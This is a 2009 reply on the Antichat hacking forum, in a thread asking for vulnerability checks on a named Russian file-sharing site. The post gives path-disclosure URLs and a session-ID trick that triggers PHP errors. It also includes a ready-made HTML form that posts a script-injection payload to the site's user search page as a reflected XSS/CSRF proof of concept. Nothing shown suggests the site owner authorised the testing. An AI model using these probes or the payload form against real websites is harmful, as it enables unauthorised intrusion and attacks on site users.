Тема: Проверьте на уязвимости www.yastreba.net
Показать сообщение отдельно

  #5  
Старый 16.03.2009, 22:03
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами: 9477026

Репутация: 2362
По умолчанию
Раскрытие путей:
http://www.yastreba.net/loads/?d[]=
http://www.yastreba.net/loads/?d=Fotoshop%2FSHrifty&f[]=100908gyp.zip

Или вставляем неразрешенные символы в идентификатор сессии
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /[bla/bla/bla]/sess.php on line 3

XSS/XSRF
http://www.yastreba.net/users.php?go

Мини-сплойт:
Код:
<form action='http://www.yastreba.net/users.php?go' method='post'>
<input name="usearch" type="text" value='"><script>alert()</script>' />
<input type='submit'>
</form>
Последний раз редактировалось oRb; 16.03.2009 в 22:07..
 
Ответить с цитированием